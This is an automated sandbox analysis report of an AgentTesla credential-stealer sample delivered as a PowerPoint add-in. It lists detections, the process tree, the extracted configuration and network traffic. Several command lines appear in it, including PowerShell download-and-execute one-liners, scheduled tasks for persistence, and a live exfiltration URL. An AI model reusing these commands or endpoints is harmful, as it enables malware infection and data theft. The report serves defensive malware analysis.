Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3.ppam

Overview

General Information

Sample Name:3.ppam
Analysis ID:553159
MD5:df075573f3546a582d5f4c690a469d9d
SHA1:60c1884b11d4eb05f687e077adadcd749b7a488d
SHA256:4337ff8e652f6fe6b0a8d0a01a67c23764a3bf31eb9ae5fca8826f246d1de2ed
Tags:ppam
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Creates an autostart registry key pointing to binary in C:\Windows
Document contains an embedded VBA macro which may execute processes
Writes to foreign memory regions
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses known network protocols on non-standard ports
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Connects to a URL shortener service
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • POWERPNT.EXE (PID: 5140 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cmd.exe (PID: 4964 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • POWERPNT.EXE (PID: 5720 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou " MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
      • powershell.exe (PID: 6628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6028 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 15FF7D8324231381BAD48A052F85DF04)
        • aspnet_compiler.exe (PID: 1200 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 6068 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 5156 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
  • powershell.exe (PID: 3660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6240 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6656 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • powershell.exe (PID: 1284 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6288 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: aspnet_compiler.exe PID: 6068JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: aspnet_compiler.exe PID: 6068JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: Suspicious aspnet_compiler.exe ExecutionShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ProcessId: 1200
          Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
          Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866651880071197.6628.DefaultAppDomain.powershell

          Persistence and Installation Behavior:

          barindex
          Sigma detected: Schedule system processShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 31.0.aspnet_compiler.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 3.ppamReversingLabs: Detection: 25%
          Antivirus detection for URL or domainShow sources
          Source: https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txtAvira URL Cloud: Label: malware
          Source: 31.0.aspnet_compiler.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49780 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49784 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49825 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49824 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.3:49827 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 34.102.176.152:443 -> 192.168.2.3:49828 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49829 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49834 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49835 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49836 version: TLS 1.0
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

          Software Vulnerabilities:

          barindex
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficDNS query: name: www.j.mp
          Source: global trafficTCP traffic: 192.168.2.3:49776 -> 67.199.248.17:80
          Source: global trafficTCP traffic: 192.168.2.3:49780 -> 104.16.202.237:443
          Source: powerpnt.exeMemory has grown: Private usage: 0MB later: 49MB

          Networking:

          barindex
          Uses known network protocols on non-standard portsShow sources
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewIP Address: 104.16.202.237 104.16.202.237
          Source: Joe Sandbox ViewIP Address: 104.16.202.237 104.16.202.237
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49780 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49784 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49825 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49824 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.3:49827 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 34.102.176.152:443 -> 192.168.2.3:49828 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49829 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49834 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49835 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49836 version: TLS 1.0
          Source: global trafficHTTP traffic detected: GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p26ynn.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7lConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.j.mpConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bit.lyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
